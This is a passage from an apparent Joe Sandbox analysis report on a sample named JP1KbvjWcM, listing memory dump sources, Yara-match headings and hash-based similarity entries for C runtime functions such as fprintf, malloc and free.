                  • Associated: 00000000.00000002.2912142684.00007FF65B3B8000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912155900.00007FF65B3B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912172386.00007FF65B3BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912188119.00007FF65B3C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff65b3b0000_JP1KbvjWcM.jbxd
                  Similarity
                  • API ID: fprintf
                  • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                  • API String ID: 383729395-2187435201
                  • Opcode ID: 0987f1bca5e4867893d9def00a6feebb28f4f6d67b3c7e1dac15035582c1f842
                  • Instruction ID: dd68e0d0b04cd81f33b495cc4cdc3f681cceb02bd85a81ea89cab6ced25c5d7b
                  • Opcode Fuzzy Hash: 0987f1bca5e4867893d9def00a6feebb28f4f6d67b3c7e1dac15035582c1f842
                  • Instruction Fuzzy Hash: A2F01266D18E8482D2029F1CE4001BB7335FF5E798F295325EF8D7A569DF29E582D700
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2912126968.00007FF65B3B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65B3B0000, based on PE: true
                  • Associated: 00000000.00000002.2912112951.00007FF65B3B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912142684.00007FF65B3B8000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912155900.00007FF65B3B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912172386.00007FF65B3BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912188119.00007FF65B3C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff65b3b0000_JP1KbvjWcM.jbxd
                  Similarity
                  • API ID: fprintf
                  • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                  • API String ID: 383729395-4273532761
                  • Opcode ID: 1895b7346dc32dca3c0fb7393d22f38cbd53d2c6ec44ade5251a4a741e2b0a1f
                  • Instruction ID: 2e164e44f49d271ff788a8c5fffaf81534f584a07590dd4c478d345d0fe7265a
                  • Opcode Fuzzy Hash: 1895b7346dc32dca3c0fb7393d22f38cbd53d2c6ec44ade5251a4a741e2b0a1f
                  • Instruction Fuzzy Hash: 22F01266D18E8482D2029F1CE4001BB7335FF5D798F285325EF8D7A569DF29E5829700
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2912126968.00007FF65B3B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65B3B0000, based on PE: true
                  • Associated: 00000000.00000002.2912112951.00007FF65B3B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912142684.00007FF65B3B8000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912155900.00007FF65B3B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912172386.00007FF65B3BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912188119.00007FF65B3C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff65b3b0000_JP1KbvjWcM.jbxd
                  Similarity
                  • API ID: fprintf
                  • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                  • API String ID: 383729395-2713391170
                  • Opcode ID: a1c64b0ed614ac845be99ae91a72a71460bb04601bf6c00efd1426a2d7401224
                  • Instruction ID: 67709f71d3efc48a7e8c4e2a8d5c67572f6cc36317e89f0828e985887049693b
                  • Opcode Fuzzy Hash: a1c64b0ed614ac845be99ae91a72a71460bb04601bf6c00efd1426a2d7401224
                  • Instruction Fuzzy Hash: D9F06226C08E8882D2028F1CE4001BB7331FF4E788F285325EF8D7A169DF29E582C700
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2912126968.00007FF65B3B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65B3B0000, based on PE: true
                  • Associated: 00000000.00000002.2912112951.00007FF65B3B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912142684.00007FF65B3B8000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912155900.00007FF65B3B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912172386.00007FF65B3BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912188119.00007FF65B3C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff65b3b0000_JP1KbvjWcM.jbxd
                  Similarity
                  • API ID: fprintf
                  • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                  • API String ID: 383729395-4283191376
                  • Opcode ID: 33d30dbd4ff50b0859772142c1d47765158d2ad64e64a143ae7efa0c629909e8
                  • Instruction ID: e6e3d5cc6fc9e9fe9f81767e2b61c6abdf6c5435753f81e98bd5cb992af877fc
                  • Opcode Fuzzy Hash: 33d30dbd4ff50b0859772142c1d47765158d2ad64e64a143ae7efa0c629909e8
                  • Instruction Fuzzy Hash: E8F01266D18E8482D2029F1CE4001BB7335FF5E798F295325EF8D7A569DF29E582D700
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2912126968.00007FF65B3B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65B3B0000, based on PE: true
                  • Associated: 00000000.00000002.2912112951.00007FF65B3B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912142684.00007FF65B3B8000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912155900.00007FF65B3B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912172386.00007FF65B3BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2912188119.00007FF65B3C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff65b3b0000_JP1KbvjWcM.jbxd
                  Similarity
                  • API ID: fprintf
                  • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                  • API String ID: 383729395-2468659920
                  • Opcode ID: de13d2bc3325a385dd781bb96c52ce61e4d0120fd2352701a1b64ed63d8d5b79
                  • Instruction ID: dc0a2dc7ea51c75eb2b5f752b9bc1c35ce9267af599f91f394d36ec9b403d134
                  • Opcode Fuzzy Hash: de13d2bc3325a385dd781bb96c52ce61e4d0120fd2352701a1b64ed63d8d5b79
                  • Instruction Fuzzy Hash: 87F03616D08E8482D6029F1CE4001AB7335FF5D799F185326EF8D7A569DF29E582C700
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: free$_errno$_calloc_implcalloc
                  • String ID:
                  • API String ID: 4000150058-0
                  • Opcode ID: 098b9973f943fd418b7180529354ef0ede5274538db457ffc537a6b083c63ad8
                  • Instruction ID: 19d8326a8506864fbb48434fe4ed2c4bbdfe469278efcd0852deedb16da67364
                  • Opcode Fuzzy Hash: 098b9973f943fd418b7180529354ef0ede5274538db457ffc537a6b083c63ad8
                  • Instruction Fuzzy Hash: 3EC1FA36604FE48AE764CF65E88439E77A4F788B88F14412AEB8D87B58DB79C455CB00
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911937188.00000265B2060000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B2060000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b2060000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: free$_errno$_callnewhmalloc
                  • String ID:
                  • API String ID: 2761444284-0
                  • Opcode ID: 220d10eecca3932b28677e19a5d899b4e1de467fae96e5e6bbac4d4284393be2
                  • Instruction ID: a39332540fd7c5c3bbffe75e410bd9749f0b4ab749dfd8decb9e37eb239df1d6
                  • Opcode Fuzzy Hash: 220d10eecca3932b28677e19a5d899b4e1de467fae96e5e6bbac4d4284393be2
                  • Instruction Fuzzy Hash: DB619430218E2D4BEB59EB2894ED7FD72D1E794354F10052DF44BC32EBDE25984297A2
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911937188.00000265B2060000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B2060000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b2060000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: malloc
                  • String ID:
                  • API String ID: 2803490479-0
                  • Opcode ID: eb22e79342f6c44f5990d3d93bc1acaf377093f70efb3d4e41a798bd81bbd69f
                  • Instruction ID: 6f94b6025edffcf0eeaabc59d19d864bdd156c5a7480b4c9b957c1c937cd3674
                  • Opcode Fuzzy Hash: eb22e79342f6c44f5990d3d93bc1acaf377093f70efb3d4e41a798bd81bbd69f
                  • Instruction Fuzzy Hash: 1151D630208F1A4FEB599F2D94D92B973D1FB84714F10555DD84BC329BEA21EC0287D2
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: free$_errno$AllocHeap_callnewhmalloc
                  • String ID:
                  • API String ID: 3531731211-0
                  • Opcode ID: 12a82f6075b3f1b1b37aa8f48911ccb92805a6f06572296fb4e409a8028c0c4a
                  • Instruction ID: 306d2127f90d1082c245738e226d18a192b6471621d35c7a6a414663893a04d1
                  • Opcode Fuzzy Hash: 12a82f6075b3f1b1b37aa8f48911ccb92805a6f06572296fb4e409a8028c0c4a
                  • Instruction Fuzzy Hash: 0951B275301AE585EA2CBB21DC583BD6391BFC079CF9C0469AA1A57BDEEB7BC4018300
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: malloc
                  • String ID:
                  • API String ID: 2803490479-0
                  • Opcode ID: 1a29f9ba763a41af98fc3daf4a760b7fafa00e022ffdaa07ef0aba0b6fdaf4ad
                  • Instruction ID: 47ba9b8e30b0862b13b4631427ad2d81a7cbb78d184f8a5ea992d052432cc632
                  • Opcode Fuzzy Hash: 1a29f9ba763a41af98fc3daf4a760b7fafa00e022ffdaa07ef0aba0b6fdaf4ad
                  • Instruction Fuzzy Hash: 46417132204BF087EB5CDB26A81876D63A1FBC8B8CF484525DE6A57789DF35D805C700
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B01A0000, based on PE: true
                  • Associated: 00000000.00000002.2911591072.00000265B01E8000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EB000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F1000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.2911591072.00000265B01F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_265b01a0000_JP1KbvjWcM.jbxd
                  Yara matches
                  Similarity
                  • API ID: ErrorLast$CurrentProcessfreemalloc
                  • String ID:
                  • API String ID: 1397824077-0
                  • Opcode ID: cf62d47a1d5fdb9c876962cfa4c676d021a3fa8d1c8180fd698ba2a0010a64ef
                  • Instruction ID: 2ff61a850e3dc7108fccfca1789e7bb768619293d6f89c977473f6345fd7f0f4
                  • Opcode Fuzzy Hash: cf62d47a1d5fdb9c876962cfa4c676d021a3fa8d1c8180fd698ba2a0010a64ef
                  • Instruction Fuzzy Hash: 25419572314EE181E768EB26E8447AE6391FFC478CF455425AF8947A9EEF3AC1418700